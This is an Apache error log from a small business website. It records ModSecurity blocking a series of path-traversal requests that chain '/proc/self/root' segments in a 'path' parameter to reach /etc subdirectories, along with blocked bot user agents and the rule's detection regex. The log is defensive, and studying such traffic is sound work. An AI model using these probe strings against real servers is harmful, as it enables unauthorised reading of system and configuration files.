https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:04:31.610523 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.244.43:51986] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrpL9a6ubjKNq_cu4bLyAAAA0Q"]
[Wed Mar 18 15:04:36.111053 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.228.61:41334] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrpNNa6ubjKNq_cu4bL0QAAA1E"]
[Wed Mar 18 15:04:46.215757 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:48612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrpPuyqAr6etmhZHNr2VgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:04:49.740059 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:50668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrpQeoXxyEfFpUF8f-iWwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:05:14.005873 2026] [mime_magic:error] [pid 11816:tid 140411725141760] (70014)End of file found: [client 57.141.18.11:37876] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:05:24.090930 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:42574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrpZEzinOy1jxa1j4dJZAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:05:45.200193 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:46328] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrpeQbLMZ6AikZjR9XtKgAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:06:01.190273 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:52788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrpieoXxyEfFpUF8f-i1QAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:06:03.800743 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:38222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrpi8df6f5d65gmYZQDcAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:06:27.756070 2026] [mime_magic:error] [pid 29882:tid 140411699963648] (70014)End of file found: [client 57.141.18.9:39788] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:06:39.219939 2026] [mime_magic:error] [pid 11816:tid 140411565680384] (70014)End of file found: [client 57.141.18.58:40430] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:07:21.752486 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:54678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrp2QbLMZ6AikZjR9XtigAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 15:07:41.571536 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:49890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrp7QkwaGbbGflqUZBA-gAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:07:56.728228 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:38228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrp_EzinOy1jxa1j4dJ9QAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:08:20.296983 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:41402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqFAkwaGbbGflqUZBBGAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:08:23.867211 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:47014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqF8df6f5d65gmYZQDrgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:08:42.715975 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:47028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqKta6ubjKNq_cu4bMTgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:09:10.722460 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:38738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqRuyqAr6etmhZHNr2_wAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:09:15.122487 2026] [mime_magic:error] [pid 15826:tid 140411548894976] (70014)End of file found: [client 74.7.243.128:36504] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/rpm/platform
[Wed Mar 18 15:09:25.819009 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:36516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqVew_le52K8_3pV0K3wAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:09:28.291528 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:38360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqWPu8EFLIOrSqIpswTgAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 15:09:29.524712 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:52132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqWcdf6f5d65gmYZQD2wAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 15:09:31.461366 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:52148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqWvu8EFLIOrSqIpswUwAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:09:32.580391 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:48646] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqXOoXxyEfFpUF8f-jZwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:09:33.043167 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.244.43:34682] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrqXeyqAr6etmhZHNr3AgAAAE4"]
[Wed Mar 18 15:09:33.864896 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:56082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrqXcdf6f5d65gmYZQD3gAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:09:36.659297 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.228.61:54276] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrqYPu8EFLIOrSqIpswXAAAAlQ"]
